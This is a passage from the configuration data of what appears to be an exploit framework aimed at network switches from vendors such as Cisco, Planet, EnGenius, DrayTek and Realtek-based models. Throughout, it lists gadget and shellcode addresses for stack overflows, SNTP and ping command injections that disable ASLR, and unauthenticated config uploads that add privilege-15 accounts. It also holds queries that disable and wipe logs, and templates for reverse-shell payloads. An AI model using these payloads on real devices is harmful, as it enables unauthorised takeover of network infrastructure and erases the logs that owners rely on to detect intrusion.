'address':0x436D9C,
'account':'&usrName=USERNAME&usrPrivType=15&usrPriv=15',
'vulnerable': True,
},
'stack_cgi_del_account': {
'address':0x437124,
'account':'&_del=1',
'vulnerable': True,
},
'stack_cgi_log': {
'log_settings_set':0x47D760,
'log_ramClear':0x480804,
'log_fileClear':0x480804,
'vulnerable': True,
},
'stack_cgi_sntp': {
'sys_timeSntp_set':0x43BA8C,
'sys_timeSntpDel_set':0x43BA8C,
'sys_timeSettings_set':0x43AF54,
'vulnerable':False,
},
'heack_cgi_shell': {
'cgi':'dispatcher.cgi',
'query':'username='+ self.random_string(100) +'_RA_START&password='+ self.random_string(59) +'&STARTUP_BACKUP=1'+ (('&' + struct.pack('>L',0x2404FF3D) + struct.pack('>L',0x2404FFFF)) * 70) + '&' + struct.pack('>L',0x2404FF3D) +'_SHELLCODE',
'START':0x10010104,
'STOP': 0x104006A0,
'usr_nop': 25,
'pwd_nop': 15,
'align': 0,
'stack':False,
},
},
},
'222-40570': {
'template':'Realtek',
'version':'3.0.0.43126',
'model':'RTL8380-24GE-4GEC',
'uri':'https://www.realtek.com/en/products/communications-network-ics/item/rtl8381m-vb-cg-2',
'exploit': {
'heack_hydra_shell': {
'gadget': 0x40E6DC,
'system': 0x8f99851c,
'handler': 0x24841ea8,
'v0': 7,
'vulnerable': True,
},
'stack_cgi_add_account': {
'vulnerable': False,
},
'stack_cgi_del_account': {
'vulnerable': False,
},
'stack_cgi_diag': {
'sys_ping_post_cmd':'ip=127.0.0.1 ;echo 0 > /proc/sys/kernel/randomize_va_space; cat /proc/sys/kernel/randomize_va_space&count=1',
'verify_uri':'/tmp/pingtest_tmp',
'web_sys_ping_post':0x422980,
'vulnerable': True,
},
'stack_cgi_log': {
'log_settings_set':0x481968,
'log_ramClear':0x4847DC,
'log_fileClear':0x4847DC,
'vulnerable': True,
},
'stack_cgi_sntp': {
'sys_timeSntp_set':0x42C8F0,
'sys_timeSntpDel_set':0x42C8F0,
'sys_timeSettings_set':0x42C8F0,
'vulnerable': True,
},
'heack_cgi_shell': {
'cgi':'dispatcher.cgi',
'query':'username=_USRNOP&password=_PWDNOP_RA_START&login=1&_USRNOP_USRNOP_SHELLCODE',
'START':0x7fff7004,
'STOP':0x7fc60000,
'usr_nop': 28,
'pwd_nop': 20,
'align': 0,
'stack':True,
'vulnerable': True,
},
},
},
'13984-12788': {
'template':'OpenMESH',
'version':'01.03.24_180823-1626',
'model':'OMS24',
'uri':'https://www.openmesh.com/',
'exploit': {
'heack_hydra_shell': {
'gadget': 0x40E12C,
'system': 0x8f99851c,
'handler': 0x248405a0,
'v0': 7,
'vulnerable': True,
},
'stack_cgi_add_account': {
'address':0x424890,
'account':'&na=USERNAME&pw=PASSWORD&pv=0&op=1&',
'vulnerable': True,
},
'stack_cgi_del_account': {
'address':0x424890,
'account':'&na=USERNAME&pw=&pv=0&op=0',
'vulnerable': True,
},
'stack_cgi_diag': {
'sys_ping_post_cmd':'&ip=127.0.0.1 ; echo 0 > /proc/sys/kernel/randomize_va_space #&mh=30&uid=0',
'sys_ping_post_check':'&ip=127.0.0.1 ; cat /proc/sys/kernel/randomize_va_space > /tmp/conf_tmp/check #&mh=30&uid=0',
'verify_uri':'/conf_tmp/check',
'web_sys_ping_post': 0x424248,
'vulnerable': True,
},
'stack_cgi_log': {
'log_settings_set':0x43EA88,
'log_ramClear':0x440660,
'log_fileClear':0x440660,
'vulnerable': True,
},
'stack_cgi_sntp': {
'sys_timeSntp_set':0x425260,
'sys_timeSntpDel_set':0x425260,
'sys_timeSettings_set':0x425260,
'vulnerable': True,
},
'heack_cgi_shell': {
'cgi':'security.cgi',
'START':0x100181A0,
'STOP':0x104006A0,
'usr_nop': 987,
'pwd_nop': 69,
'align': 0,
'stack':False,
'vulnerable': True,
},
},
},
'222-64895': {
'template':'Xhome',
'version':'3.0.0.43126',
'model':'DownLoop-G24M',
'uri':'http://www.xhome.com.tw/product_info.php?info=p116_XHome-DownLoop-G24M----------------------------------------.html',
'exploit': {
'heack_hydra_shell': {
'gadget': 0x40E6DC,
'system': 0x8f99851c,
'handler': 0x24841ea8,
'v0': 7,
'vulnerable': True,
},
'stack_cgi_add_account': {
'vulnerable': False,
},
'stack_cgi_del_account': {
'vulnerable': False,
},
'stack_cgi_diag': {
'sys_ping_post_cmd':'ip=127.0.0.1 ; echo 0 > /proc/sys/kernel/randomize_va_space; cat /proc/sys/kernel/randomize_va_space&count=1',
'verify_uri':'/tmp/pingtest_tmp',
'web_sys_ping_post':0x4229A0,
'vulnerable': True,
},
'stack_cgi_log': {
'log_settings_set':0x481988,
'log_ramClear':0x4847FC,
'log_fileClear':0x4847FC,
'vulnerable': True,
},
'stack_cgi_sntp': {
'sys_timeSntp_set':0x42C910,
'sys_timeSntpDel_set':0x42C910,
'sys_timeSettings_set':0x42B6F8,
'vulnerable': True,
},
'heack_cgi_shell': {
'cgi':'dispatcher.cgi',
'query':'username=_USRNOP&password=_PWDNOP_RA_START&login=1&_USRNOP_USRNOP_SHELLCODE',
'START':0x7fff7004,
'STOP':0x7fc60000,
'usr_nop': 28,
'pwd_nop': 20,
'align': 0,
'stack':True,
'vulnerable': True,
},
},
},
'225-21785': {
'model':'SX-8P',
'template':'Pakedge',
'version':'1.04',
'exploit': {
'heack_hydra_shell': {
'gadget': 0x40C86C,
'system': 0x8f998538,
'handler': 0x248492ec,
'v0': 7,
'vulnerable': True,
},
'stack_cgi_diag': {
'vulnerable': False,
},
'stack_cgi_add_account': {
'vulnerable': False,
},
'stack_cgi_del_account': {
'vulnerable': False,
},
'stack_cgi_log': {
'log_settings_set':0x413AEC,
'log_ramClear':0x413A14,
'log_fileClear':0x413A14,
'vulnerable': True,
},
'stack_cgi_sntp': {
'sys_timeSntp_set':0x4108E4,
'sys_timeSntpDel_set':0x4108E4,
'sys_timeSettings_set':0x4108E4,
'vulnerable': True,
},
'heack_cgi_shell': {
'cgi':'set.cgi',
'START':0x7ffeff04,
'STOP':0x7fc60000,
'usr_nop': 64,
'pwd_nop': 77,
'align': 3,
'stack':True,
'vulnerable': True,
},
},
},
'752-95168': {
'template':'DrayTek',
'version':'2.1.4',
'model':'VigorSwitch P1100',
'uri':'https://www.draytek.com/products/vigorswitch-p1100/',
'exploit': {
'heack_hydra_shell': {
'gadget': 0x40C67C,
'system': 0x8f99852c,
'handler': 0x248490ac,
'v0': 7,
'vulnerable': True,
},
'stack_cgi_diag': {
'vulnerable': False,
},
'stack_cgi_add_account': {
'vulnerable': False,
},
'stack_cgi_del_account': {
'vulnerable': False,
},
'stack_cgi_log': {
'log_settings_set':0x413E34,
'log_ramClear':0x413D64,
'log_fileClear':0x413D64,
'vulnerable': True,
},
'stack_cgi_sntp': {
'sys_timeSntp_set':0x410CA8,
'sys_timeSntpDel_set':0x410CA8,
'sys_timeSettings_set':0x410CA8,
'vulnerable': True,
},
'heack_cgi_shell': {
'cgi':'set.cgi',
'START':0x7ffeff04,
'STOP':0x7fc60000,
'usr_nop': 64,
'pwd_nop': 77,
'align': 3,
'stack':True,
'vulnerable': True,
},
},
},
'224-5061': {
'template':'Cerio',
'version':'1.00.29',
'model':'CS-2424G-24P',
'uri':'https://www.cerio.com.tw/eng/switch/poe-switch/cs-2424g-24p/',
'exploit': {
'heack_hydra_shell': {
'gadget': 0x40E6DC,
'system': 0x8f998524,
'handler': 0x248411bc,
'v0': 7,
'vulnerable': True,
},
'stack_cgi_add_account': {
'vulnerable': False,
},
'stack_cgi_del_account': {
'vulnerable': False,
},
'stack_cgi_diag': {
'sys_ping_post_cmd':'&srvHost=127.0.0.1 ;echo 0 > /proc/sys/kernel/randomize_va_space;cat /proc/sys/kernel/randomize_va_space > /tmp/check;&count=1',
'sys_ping_post_check':'',
'web_sys_ping_post':0x40E114,
'verify_uri':'/tmp/check',
'vulnerable': True,
},
'stack_cgi_log': {
'log_settings_set':0x41DB4C,
'log_ramClear':0x41DA94,
'log_fileClear':0x41DA94,
'vulnerable': True,
},
'stack_cgi_sntp': {
'sys_timeSntp_set':0x415F14,
'sys_timeSntpDel_set':0x415F14,
'sys_timeSettings_set':0x415F14,
'vulnerable': False,
},
'heack_cgi_shell': {
'cgi':'set.cgi',
'START':0x7ffeff04,
'STOP':0x7fc60000,
'usr_nop': 64,
'pwd_nop': 77,
'align': 3,
'stack':True,
'vulnerable': True,
},
},
},
'222-45866': {
'template':'Abaniact',
'version':'116B00033',
'model':'AML2-PS16-17GP L2',
'uri':'https://www.abaniact.com/L2SW/',
'exploit': {
'heack_hydra_shell': {
'gadget': 0x40E65C,
'system': 0x8f998524,
'handler': 0x2484152c,
'v0': 7,
'vulnerable': True,
},
'stack_cgi_add_account': {
'vulnerable': False,
},
'stack_cgi_del_account': {
'vulnerable': False,
},
'stack_cgi_diag': {
'web_sys_ping_post':0x429F58,
'sys_ping_post_cmd':'ip=127.0.0.1 ;echo 0 > /proc/sys/kernel/randomize_va_space;cat /proc/sys/kernel/randomize_va_space > /tmp/traceroute_tmp #&tr_maxhop=30&count=1',
'verify_uri':'/tmp/traceroute_tmp',
'vulnerable': True,
},
'stack_cgi_log': {
'log_settings_set':0x4B4FE4,
'log_ramClear':0x4BA5D0,
'log_fileClear':0x4BA5D0,
'vulnerable': True,
},
'stack_cgi_sntp': {
'sys_timeSntp_set':0x43764C,
'sys_timeSntpDel_set':0x43764C,
'sys_timeSettings_set':0x431CC4,
'vulnerable': False,
},
'heack_cgi_shell': {
'cgi':'dispatcher.cgi',
'query':'username=admin&password=_PWDNOP_RA_START&login=1&shellcod=_USRNOP_USRNOP_USRNOP_SHELLCODE',
'START':0x7ffe6e04,
'STOP':0x7fc60000,
'stack':True,
'usr_nop': 53,
'pwd_nop': 45,
'align': 0,
'vulnerable': True,
'workaround':True,
},
},
},
'222-81176': {
'template':'TG-NET',
'version':'3.1.1-R1',
'model':'P3026M-24POE (V3)',
'uri':'http://www.tg-net.net/productshow.asp?ProdNum=1049&parentid=98',
'exploit': {
'heack_hydra_shell': {
'gadget': 0x40C74C,
'system': 0x8f99851c,
'handler': 0x2484a2d4,
'v0': 7,
'vulnerable': True,
},
'stack_cgi_diag': {
'vulnerable': False,
},
'stack_cgi_add_account': {
'vulnerable': False,
},
'stack_cgi_del_account': {
'vulnerable': False,
},
'stack_cgi_log': {
'log_settings_set':0x46AC10,
'log_ramClear':0x46E368,
'log_fileClear':0x46E368,
'vulnerable': True,
},
'stack_cgi_sntp': {
'sys_timeSntp_set':0x42243C,
'sys_timeSntpDel_set':0x42243C,
'sys_timeSettings_set':0x424DE0,
'vulnerable':False,
},
'heack_cgi_shell': {
'cgi':'dispatcher.cgi',
'query':'username='+ self.random_string(112) +'_RA_START&password='+ self.random_string(80) +'&login=1'+ ('&%24%04%FF=%24%04%FF%FF' * 50) +'_SHELLCODE',
'START':0x10010104,
'STOP' :0x10600604,
'usr_nop': 28,
'pwd_nop': 20,
'align': 0,
'stack':False,
'vulnerable': True,
},
},
},
}
Vendor_Template = {
'Planet': {
'vendor': 'PLANET Technology Corp.',
'modulus_uri':'',
'info_leak':False,
'info_leak_JSON':False,
'info_leak_uri':'',
'xsid':False,
'xsid_uri':'',
'login': {
'description':'Login/Logout on remote device',
'authenticated': True,
'json':False,
'encryption':'clear',
'login_uri':'/cgi-bin/dispatcher.cgi?cmd=1',
'query':'username=USERNAME&password=PASSWORD&login=1',
'status_uri':'/cgi-bin/dispatcher.cgi?cmd=547',
'logout_uri':'/cgi-bin/dispatcher.cgi?cmd=3',
'vulnerable': True,
'safe': True
},
'log':{
'description':'Disable and clean logs',
'authenticated': True,
'json':False,
'disable_uri':'/cgi-bin/dispatcher.cgi',
'disable_query':'LOGGING_SERVICE=0&cmd=5121',
'status':'',
'clean_logfile_uri':'/cgi-bin/dispatcher.cgi',
'clean_logfile_query':'cmd_5132=Clear+file+messages',
'clean_logmem_uri':'/cgi-bin/dispatcher.cgi',
'clean_logmem_query':'cmd_5132=Clear+buffered+messages',
'vulnerable': True,
'safe': True
},
'verify': {
'httpuploadbakcfg.cgi':{
'authenticated': False,
'response':'html',
'Content-Type':True,
'description':'Upload "backup-config" (PoC: Create invalid file to verify)',
'uri':'/cgi-bin/httpuploadbakcfg.cgi',
'check_uri':'',
'content':'dummy',
'content_check':' Invalid config file!!',
'vulnerable': True,
'safe': True
},
'httpuploadruncfg.cgi':{
'authenticated': False,
'response':'html',
'Content-Type':True,
'description':'Upload/update "running-config" (PoC: Create invalid file to verify)',
'uri':'/cgi-bin/httpuploadruncfg.cgi',
'check_uri':'',
'content':'dummy',
'content_check':' Invalid config file!!',
'vulnerable': True,
'safe': True
},
'httprestorecfg.cgi':{
'authenticated': False,
'response':'html',
'Content-Type':True,
'description':'Upload "startup-config" (PoC: Create invalid file to verify)',
'uri':'/cgi-bin/httprestorecfg.cgi',
'check_uri':'',
'content':'dummy',
'content_check':' Invalid config file!!',
'vulnerable': True,
'safe': True
},
'httpupload.cgi':{
'authenticated': False,
'response':'html',
'Content-Type':True,
'description':'Upload/Upgrade "Firmware" (PoC: Create invalid file to verify)',
'uri':'/cgi-bin/httpupload.cgi',
'check_uri':'',
'content':'dummy',
'content_check':'Image Signature Error',
'vulnerable': True,
'safe': True
},
'dispatcher.cgi': {
'description':'Stack overflow in "username/password" (PoC: crash CGI)',
'response':'502',
'Content-Type':False,
'authenticated': False,
'uri':'/cgi-bin/dispatcher.cgi?cmd=1',
'content':'username=admin&password='+ self.random_string(184) + '&login=1',
'check_uri':False,
'content_check':False,
'vulnerable': True,
'safe': True
},
},
'exploit': {
'heack_hydra_shell': {
'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',
'authenticated': False,
'uri':'/cgi-bin/httpupload.cgi?XXX',
'vulnerable': True,
'safe': False
},
'priv15_account': {
'description':'Upload/Update running-config (PoC: add priv 15 credentials)',
'json':False,
'authenticated': False,
'encryption':'md5',
'content':'Content-Type\n\nSYSTEM CONFIG FILE ::= BEGIN\nusername "USERNAME" secret encrypted PASSWORD\n\n------',
'add_uri':'/cgi-bin/httpuploadruncfg.cgi',
'del_query':'',
'del_uri':'/cgi-bin/dispatcher.cgi?cmd=526&usrName=USERNAME',
'vulnerable': True,
'safe': True
},
'sntp': {
'description':'SNTP command injection (PoC: disable ASLR)',
'json':False,
'authenticated': True,
'enable_uri':'/cgi-bin/dispatcher.cgi',
'enable_query':'sntp_enable=1&cmd=548',
'status_uri':'/cgi/get.cgi?cmd=sys_timeSettings',
'inject_uri':'/cgi-bin/dispatcher.cgi',
'inject_query':'sntp_Server=`echo 0 > /proc/sys/kernel/randomize_va_space`&sntp_Port=123&cmd=550',
'check_query':'sntp_Server=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&sntp_Port=123&cmd=550',
'delete_uri':'/cgi-bin/dispatcher.cgi',
'delete_query':'sntp_Server=+&sntp_Port=123&cmd=550',
'disable_uri':'/cgi-bin/dispatcher.cgi',
'disable_query':'sntp_enable=0&cmd=548',
'verify_uri':'/tmp/check',
'vulnerable': True,
'safe': True
},
'stack_cgi_diag': {
'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
'authenticated': False,
'uri':'/cgi-bin/dispatcher.cgi?cmd=1',
'content':'username='+ self.random_string(212) +'_JUMP_&password='+ self.random_string(180) +'&_CMD_&login=1',
'sys_ping_post_check':'',
'sys_ping_post_SIGSEGV': False,
'workaround':True,
'vulnerable': True,
'safe': True
},
'stack_cgi_log': {
'description':'Stack overflow in "username/password" (PoC: Disable/Clean logs)',
'authenticated': False,
'uri':'/cgi-bin/dispatcher.cgi?cmd=1',
'content':'username='+ self.random_string(212) +'_JUMP_&password='+ self.random_string(180) +'_CMD_&login=1',
'log_settings_set_cmd':'&LOGGING_SERVICE=0',
'log_settings_set_SIGSEGV':False,
'log_ramClear_cmd':'',
'log_ramClear_SIGSEGV':False,
'log_fileClear_cmd':'',
'log_fileClear_SIGSEGV':False,
'workaround':True,
'verify_uri':'/tmp/check',
'vulnerable': True,
'safe': True
},
'stack_cgi_sntp': {
'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
'authenticated': False,
'uri':'/cgi-bin/dispatcher.cgi?cmd=1',
'content':'username='+ self.random_string(212) +'_JUMP_&password='+ self.random_string(180) +'_CMD_&login=1',
'sys_timeSntp_set_cmd':'&sntp_Server=`echo 0 > /proc/sys/kernel/randomize_va_space`&sntp_Port=123',
'sys_timeSntp_set_check':'&sntp_Server=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&sntp_Port=123',
'sys_timeSntpDel_set_cmd':'&sntp_Server=+&sntp_Port=123',
'sys_timeSettings_set_cmd_enable':'&sntp_enable=1',
'sys_timeSettings_set_cmd_disable':'&sntp_enable=0',
'sys_timeSettings_set_SIGSEGV': False,
'workaround':True,
'verify_uri':'/tmp/check',
'vulnerable': True,
'safe': True
},
'heack_cgi_shell': {
'description':'Stack overflow in "username/password" (PoC: reverse shell)',
'authenticated': False,
'login_uri':'/cgi-bin/dispatcher.cgi?cmd=1',
'logout_uri':'/cgi-bin/dispatcher.cgi?cmd=3',
'query':'username=_ALIGN_USRNOP_SHELLCODE&password=_PWDNOP_RA_START&login=1',
'workaround':True,
'stack':True,
'vulnerable': True,
'safe': True
},
},
},
'Cisco': {
'vendor': 'Cisco Systems, Inc.',
'model':'Sx220',
'uri':'https://www.cisco.com/c/en/us/support/switches/small-business-220-series-smart-plus-switches/tsd-products-support-series-home.html',
'modulus_uri':'/cgi/get.cgi?cmd=home_login',
'info_leak':True,
'info_leak_JSON':True,
'info_leak_uri':'/cgi/get.cgi?cmd=home_login',
'xsid':True,
'xsid_uri':'/cgi/get.cgi?cmd=home_main',
'login': {
'description':'Login/Logout on remote device',
'authenticated': True,
'json':True,
'encryption':'rsa',
'login_uri':'/cgi/set.cgi?cmd=home_loginAuth',
'query':'{"_ds=1&username=USERNAME&password=PASSWORD&_de=1":{}}',
'status_uri':'/cgi/get.cgi?cmd=home_loginStatus',
'logout_uri':'/cgi/set.cgi?cmd=home_logout',
'vulnerable': True,
'safe': True
},
'log':{
'description':'Disable and clean logs',
'authenticated': True,
'json':True,
'disable_uri':'/cgi/set.cgi?cmd=log_settings',
'disable_query':'{"_ds=1&ram_sev_0=on&ram_sev_1=on&ram_sev_2=on&ram_sev_3=on&ram_sev_4=on&ram_sev_5=on&ram_sev_6=on&_de=1":{}}',
'status':'/cgi/get.cgi?cmd=log_settings',
'clean_logfile_uri':'/cgi/set.cgi?cmd=log_fileClear',
'clean_logfile_query':'{"":{}}',
'clean_logmem_uri':'/cgi/set.cgi?cmd=log_ramClear',
'clean_logmem_query':'{"":{}}',
'vulnerable': True,
'safe': True
},
'verify': {
'httpuploadbakcfg.cgi':{
'authenticated': False,
'response':'file',
'Content-Type':True,
'description':'Upload "backup-config" (PoC: Create invalid file to verify)',
'uri':'/cgi/httpuploadbakcfg.cgi',
'check_uri':'/tmp/startup-config',
'content':'/mnt/backup-config',
'content_check':'/mnt/backup-config',
'vulnerable': True,
'safe': True
},
'httpuploadlang.cgi':{
'authenticated': False,
'response':'html',
'Content-Type':True,
'description':'Upload/update "language" (PoC: Create invalid file to verify)',
'uri':'/cgi/httpuploadlang.cgi',
'check_uri':False,
'content': self.random_string(30),
'content_check':'errMsgLangMG',
'vulnerable': True,
'safe': True
},
'httpuploadruncfg.cgi':{
'authenticated': False,
'response':'file',
'Content-Type':True,
'description':'Upload/update "running-config" (PoC: Create invalid file to verify)',
'uri':'/cgi/httpuploadruncfg.cgi',
'check_uri':'/tmp/http_saverun_cfg',
'content':'/var/config/running-config',
'content_check':'/var/config/running-config',
'vulnerable': True,
'safe': True
},
'httprestorecfg.cgi':{
'authenticated': False,
'response':'file',
'Content-Type':True,
'description':'Upload "startup-config" (PoC: Create invalid file to verify)',
'uri':'/cgi/httprestorecfg.cgi',
'check_uri':'/tmp/startup-config',
'content':'/mnt/startup-config',
'content_check':'/mnt/startup-config',
'vulnerable': True,
'safe': True
},
'httpupload.cgi':{
'authenticated': False,
'response':'file',
'Content-Type':True,
'description':'Upload/Upgrade "Firmware" (PoC: Create invalid file to verify)',
'uri':'/cgi-bin/httpupload.cgi',
'check_uri':'/tmp/http_uploadfail',
'content':'Copy: Illegal software format',
'content_check':'Copy: Illegal software format',
'vulnerable': True,
'safe': True
},
'login.cgi': {
'description':'Stack overflow in login.cgi (PoC: create file /tmp/VUL.TXT)',
'authenticated': False,
'response':'file',
'Content-Type':False,
'uri':'/cgi/set.cgi?cmd=home_loginAuth',
'check_uri':'/tmp/VUL.TXT',
'content':'{"_ds=1&username='+ self.random_string(32) +'&password=/tmp/VUL.TXT&_de=1":{}}',
'content_check':'2',
'vulnerable': True,
'safe': True
},
'set.cgi': {
'description':'Stack overflow in "username/password" (PoC: crash CGI)',
'authenticated': False,
'response':'502',
'Content-Type':False,
'uri':'/cgi/set.cgi?cmd=home_loginAuth',
'content':'{"_ds=1&username=admin&password=' + self.random_string(312) + '&_de=1":{}}',
'check_uri':False,
'content_check':False,
'vulnerable': True,
'safe': True
},
},
'exploit': {
'heack_hydra_shell': {
'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',
'authenticated': False,
'uri':'/cgi-bin/httpupload.cgi?XXX',
'vulnerable': True,
'safe': False
},
'priv15_account': {
'description':'Upload/Update running-config (PoC: add priv 15 credentials)',
'authenticated': False,
'json':True,
'encryption':'md5',
'content':'Content-Type\n\nconfig-file-header\nusername "USERNAME" secret encrypted PASSWORD\n\n------',
'add_uri':'/cgi/httpuploadruncfg.cgi',
'del_query':'{"_ds=1&user=USERNAME&_de=1":{}}',
'del_uri':'/cgi/set.cgi?cmd=aaa_userDel',
'vulnerable': True,
'safe': True
},
'sntp': {
'description':'SNTP command injection (PoC: disable ASLR)',
'json':True,
'authenticated': True,
'enable_uri':'/cgi/set.cgi?cmd=sys_timeSettings',
'enable_query':'{"_ds=1&sntpStatus=1&_de=1":{}}',
'status_uri':'/cgi/get.cgi?cmd=sys_timeSettings',
'inject_uri':'/cgi/set.cgi?cmd=sys_timeSntp',
'inject_query':'{"_ds=1&srvDef=byIp&sntpServer=`echo 0 > /proc/sys/kernel/randomize_va_space`&cursntpPort=123&_de=1":{}}',
'check_query':'{"_ds=1&srvDef=byIp&sntpServer=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&cursntpPort=123&_de=1":{}}',
'delete_uri':'/cgi/set.cgi?cmd=sys_timeSntpDel',
'delete_query':'{"":{}}',
'disable_uri':'/cgi/set.cgi?cmd=sys_timeSettings',
'disable_query':'{"_ds=1&sntpStatus=0&_de=1":{}}',
'verify_uri':'/tmp/check',
'vulnerable': True,
'safe': True
},
'stack_cgi_diag': {
'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
'authenticated': False,
'uri':'/cgi/set.cgi?cmd=home_loginAuth',
'content':'{"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1":{}}',
'sys_ping_post_SIGSEGV': True,
'workaround':False,
'vulnerable': True,
'safe': True
},
'stack_cgi_log': {
'description':'Stack overflow in "username/password" (PoC: Disable/Clean logs)',
'authenticated': False,
'uri':'/cgi/set.cgi?cmd=home_loginAuth',
'content':'{"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1":{}}',
'log_settings_set_cmd':'',
'log_settings_set_SIGSEGV':True,
'log_ramClear_cmd':'',
'log_ramClear_SIGSEGV':True,
'log_fileClear_cmd':'',
'log_fileClear_SIGSEGV':True,
'workaround':False,
'verify_uri':'',
'vulnerable': True,
'safe': True
},
'stack_cgi_sntp': {
'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
'authenticated': False,
'uri':'/cgi/set.cgi?cmd=home_loginAuth',
'content':'{"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1":{}}',
'sys_timeSntp_set_cmd':'&srvDef=byIp&sntpServer=`echo 0 > /proc/sys/kernel/randomize_va_space`&cursntpPort=123',
'sys_timeSntp_set_check':'&sntpServer=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&cursntpPort=123',
'sys_timeSntpDel_set_cmd':'&sntpServer=+&cursntpPort=123',
'sys_timeSettings_set_cmd_enable':'&sntpStatus=1',
'sys_timeSettings_set_cmd_disable':'&sntpStatus=0',
'sys_timeSettings_set_SIGSEGV': True,
'workaround':False,
'verify_uri':'/tmp/check',
'vulnerable': True,
'safe': True
},
'heack_cgi_shell': {
'description':'Stack overflow in "username/password" (PoC: reverse shell)',
'authenticated': False,
'login_uri':'/cgi/set.cgi?cmd=home_loginAuth',
'logout_uri':'/cgi/set.cgi?cmd=home_logout',
'query':'{"_ds=1&username=_ALIGN_USRNOP_SHELLCODE&password=_PWDNOP_RA_START&_de=1":{}}',
'stack':True,
'workaround':False,
'vulnerable': True,
'safe': True
},
},
},
'EnGenius': {
'vendor': 'EnGenius Technologies, Inc.',
'modulus_uri':'',
'info_leak':True,
'info_leak_JSON':False,
'info_leak_uri':'/loginMsg.js',
'xsid':False,
'xsid_uri':'',
'login': {
'description':'Login/Logout on remote device',
'authenticated': True,
'json':True,
'encryption':'',
'login_uri':'',
'query':'',
'status_uri':'',
'logout_uri':'',
'vulnerable': False,
'safe': True
},
'login': {
'description':'Login/Logout on remote device',
'authenticated': True,
'json':True,
'encryption':'',
'login_uri':'',
'query':'',
'status_uri':'',
'logout_uri':'',
'vulnerable': False,
'safe': True
},
'log':{
'description':'Disable and clean logs',
'authenticated': True,
'json':True,
'disable_uri':'',
'disable_query':'',
'status':'',
'clean_logfile_uri':'',
'clean_logfile_query':'',
'clean_logmem_uri':'',
'clean_logmem_query':'',
'vulnerable': False,
'safe': True
},
'verify': {
'security.cgi': {
'description':'Stack overflow in "username/password" (PoC: crash CGI)',
'authenticated': False,
'response':'502',
'Content-Type':False,
'uri':'/cgi-bin/security.cgi?login',
'content':'usr=admin&pswrd=' + self.random_string(280),
'check_uri':False,
'content_check':False,
'vulnerable': True,
'safe': True
},
'datajson.cgi': {
'description':'Stack overflow in "username/password" (PoC: crash CGI)',
'authenticated': False,
'response':'502',
'Content-Type':False,
'uri':'/cgi-bin/datajson.cgi?login',
'content':'usr=admin&pswrd=' + self.random_string(288),
'check_uri':False,
'content_check':False,
'vulnerable': True,
'safe': True
},
},
'exploit': {
'heack_hydra_shell': {
'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',
'authenticated': False,
'uri':'/cgi-bin/sn_httpupload.cgi?',
'vulnerable': True,
'safe': False
},
'priv15_account': {
'description':'Upload/Update running-config (PoC: add priv 15 credentials)',
'authenticated': False,
'json':True,
'encryption':'',
'content':'',
'add_uri':'',
'del_query':'',
'del_uri':'',
'vulnerable': False,
'safe': True
},
'sntp': {
'description':'SNTP command injection (PoC: disable ASLR)',
'json':True,
'authenticated': True,
'enable_uri':'/cgi/set.cgi?cmd=sys_timeSettings',
'enable_query':'{"_ds=1&sntpStatus=1&_de=1":{}}',
'status_uri':'/cgi/get.cgi?cmd=sys_timeSettings',
'inject_uri':'/cgi/set.cgi?cmd=sys_timeSntp',
'inject_query':'{"_ds=1&srvDef=byIp&sntpServer=`echo 0 > /proc/sys/kernel/randomize_va_space`&cursntpPort=123&_de=1":{}}',
'check_query':'{"_ds=1&srvDef=byIp&sntpServer=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&cursntpPort=123&_de=1":{}}',
'delete_uri':'/cgi/set.cgi?cmd=sys_timeSntpDel',
'delete_query':'{"":{}}',
'disable_uri':'/cgi/set.cgi?cmd=sys_timeSettings',
'disable_query':'{"_ds=1&sntpStatus=0&_de=1":{}}',
'verify_uri':'/tmp/check',
'vulnerable': False,
'safe': True
},
'stack_cgi_add_account': {
'description':'Stack overflow in "username/password" (PoC: add priv 15 credentials)',
'authenticated': False,
'uri':'/cgi-bin/datajson.cgi?login',
'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',
'workaround':False,
'vulnerable': True,
'safe': True
},
'stack_cgi_del_account': {
'description':'Stack overflow in "username/password" (PoC: del priv 15 credentials)',
'authenticated': False,
'uri':'/cgi-bin/datajson.cgi?login',
'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',
'workaround':False,
'vulnerable': True,
'safe': True
},
'stack_cgi_diag': {
'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
'authenticated': False,
'uri':'/cgi-bin/datajson.cgi?login',
'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',
'sys_ping_post_SIGSEGV': True,
'workaround':False,
'vulnerable': True,
'safe': True
},
'stack_cgi_log': {
'description':'Stack overflow in "username/password" (PoC: Disable/Clean logs)',
'authenticated': False,
'uri':'/cgi-bin/datajson.cgi?login',
'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',
'log_settings_set_cmd':'&en=0',
'log_settings_set_SIGSEGV':True,
'log_ramClear_cmd':'&ta=0',
'log_ramClear_SIGSEGV':True,
'log_fileClear_cmd':'&ta=1',
'log_fileClear_SIGSEGV':True,
'workaround':False,
'verify_uri':'',
'vulnerable': True,
'safe': True
},
'stack_cgi_sntp': {
'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
'authenticated': False,
'uri':'/cgi-bin/datajson.cgi?login',
'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',
'sys_timeSntp_set_cmd':'&sa=`echo 0 > /proc/sys/kernel/randomize_va_space`&sp=123',
